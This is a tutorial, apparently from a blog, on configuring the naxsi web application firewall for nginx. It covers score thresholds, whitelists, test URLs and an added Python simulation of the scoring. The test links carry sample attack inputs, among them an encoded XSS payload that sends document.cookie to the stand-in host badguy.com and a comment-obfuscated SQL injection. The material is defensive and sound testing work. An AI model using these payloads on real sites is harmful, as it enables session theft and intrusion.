Nginx: using naxsi to block XSS and injection attacks (configuration)
CheckRule "$RFI >= 8" BLOCK;
CheckRule "$TRAVERSAL >= 4" BLOCK;
CheckRule "$EVADE >= 4" BLOCK;
CheckRule "$XSS >= 8" BLOCK;
4. You can also add a whitelist, naxsi_BasicRule.conf
   Test usage:
   BasicRule wl:0 "mz:$ARGS_VAR:script";
   BasicRule wl:0 "mz:$ARGS_VAR:id";
   This means an XSS attack is normally blocked, but once the parameter is whitelisted it is no longer blocked: here, if the GET parameter name is id or script, the request is not blocked.

BasicRule: rule description; for details see http://code.google.com/p/naxsi/wiki/BasicRule
wl:ID (WhiteList): Which rule ID(s) are whitelisted.
mz: (MatchZones): Specify the conditions to match for the rule to be whitelisted. A MatchZone must be specified in an nginx location context to enable a rule.
  ARGS : GET args
  HEADERS : HTTP headers
  BODY : POST args
  URL : The URL (before '?')
  NAME : A suffix indicating that the target element is the NAME of the variable, not its content.
For example, a whitelist targeting BODY|NAME means that the exception was triggered in the "name" of some POST (BODY) variable.
IV. Test usage notes
  1. Start nginx (if it is already running, kill the old nginx process first), then start it again; do not forget this step!
  2. Test links:
     http://10.142.138.61:8888/xss/                          passes
     http://10.142.138.61:8888/xss/?id=40/**/and/**/1=1      passes, because id is in the whitelist
     http://10.142.138.61:8888/xss/?name=40/**/and/**/1=1    blocked, contains a conditional injection
     http://10.142.138.61:8888/xss/?name=%28%29              blocked, special characters
     http://10.142.138.61:8888/xss/?term=%3Cscript%3Ewindow.open%28%22http://badguy.com?cookie=%22+document.cookie%29%3C/script%3E
                                                             blocked, parameter content contains script injection
     http://10.142.138.61:8888/xss/?title=meta%20http-equiv=%22refresh%22%20content=%220;%22
                                                             blocked
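To make the scoring model behind the CheckRule thresholds and the wl:/mz: whitelist concrete, here is an added Python simulation (not naxsi's code and not part of the original post). It uses the four CheckRule thresholds and the two BasicRule whitelist entries from this page exactly as written, but the rule ids, tokens and point weights are constructed for the demonstration and are not naxsi's real core rules. Run against the test links listed above, it reproduces the pass/block outcomes the page records and shows, via the ARGS versus ARGS|NAME zones, why a whitelist on a variable's content does not cover a hit in the variable's name.

```python
"""Toy model of naxsi-style scoring: illustrative only, not naxsi's code.

Each rule that matches adds points to a named counter ($XSS, $RFI, ...);
a CheckRule blocks the request when a counter reaches its threshold; a
BasicRule whitelist exempts rule ids (0 = all) for one match zone and
variable. Rule ids, tokens and weights below are constructed for this
demonstration and are not naxsi's real core rules.
"""
from dataclasses import dataclass
from urllib.parse import parse_qsl, urlsplit


@dataclass
class Rule:
    rid: int      # constructed id, not a real naxsi rule id
    token: str    # literal substring looked for in the decoded text
    scores: dict  # counter -> points added when the token is present


# Constructed rule set modelled on the kind of tokens a WAF scores.
RULES = [
    Rule(1, '"', {"XSS": 8}),
    Rule(2, "/*", {"XSS": 8}),
    Rule(3, "*/", {"XSS": 8}),
    Rule(4, "(", {"XSS": 4}),
    Rule(5, ")", {"XSS": 4}),
    Rule(6, "<", {"XSS": 8}),
    Rule(7, ">", {"XSS": 8}),
    Rule(8, "http://", {"RFI": 8}),
    Rule(9, "../", {"TRAVERSAL": 4}),
    Rule(10, "%", {"EVADE": 4}),  # a '%' left after decoding suggests double encoding
]

# The CheckRule thresholds exactly as in the configuration on this page.
CHECK_RULES = {"RFI": 8, "TRAVERSAL": 4, "EVADE": 4, "XSS": 8}

# (whitelisted rule id, match zone, variable name); id 0 means every rule.
# Mirrors BasicRule wl:0 "mz:$ARGS_VAR:id"; and BasicRule wl:0 "mz:$ARGS_VAR:script";
WHITELIST = [
    (0, "ARGS", "id"),
    (0, "ARGS", "script"),
]


def is_whitelisted(rule, zone, var):
    """True if some whitelist entry covers this rule in this zone for this variable."""
    return any(wl in (0, rule.rid) and wl_zone == zone and wl_var == var
               for wl, wl_zone, wl_var in WHITELIST)


def score_request(url):
    """Return (counters, matches) for the GET args of url.

    Values are inspected in zone ARGS and variable names in zone ARGS|NAME,
    which is the distinction the |NAME suffix makes in a BasicRule.
    """
    counters = {name: 0 for name in CHECK_RULES}
    matches = []
    for var, value in parse_qsl(urlsplit(url).query, keep_blank_values=True):
        for zone, text in (("ARGS", value), ("ARGS|NAME", var)):
            for rule in RULES:
                if rule.token in text and not is_whitelisted(rule, zone, var):
                    matches.append((rule.rid, zone, var))
                    for counter, points in rule.scores.items():
                        counters[counter] += points
    return counters, matches


def decide(url):
    """Apply the CheckRule thresholds: BLOCK if any counter reaches its limit."""
    counters, _ = score_request(url)
    hit = [c for c, limit in CHECK_RULES.items() if counters[c] >= limit]
    return "BLOCK" if hit else "PASS"


if __name__ == "__main__":
    # The test links from this page, used as sample input.
    for u in [
        "http://10.142.138.61:8888/xss/",
        "http://10.142.138.61:8888/xss/?id=40/**/and/**/1=1",
        "http://10.142.138.61:8888/xss/?name=40/**/and/**/1=1",
        "http://10.142.138.61:8888/xss/?name=%28%29",
    ]:
        print(decide(u), score_request(u)[0], u)
```

The whitelist is checked per rule and per zone rather than by skipping the whole variable, so a `wl:0 "mz:$ARGS_VAR:id"` entry silences every rule for the content of id but still lets a hit in the variable name (zone ARGS|NAME) count toward the thresholds, which is the behaviour the BasicRule explanation above describes.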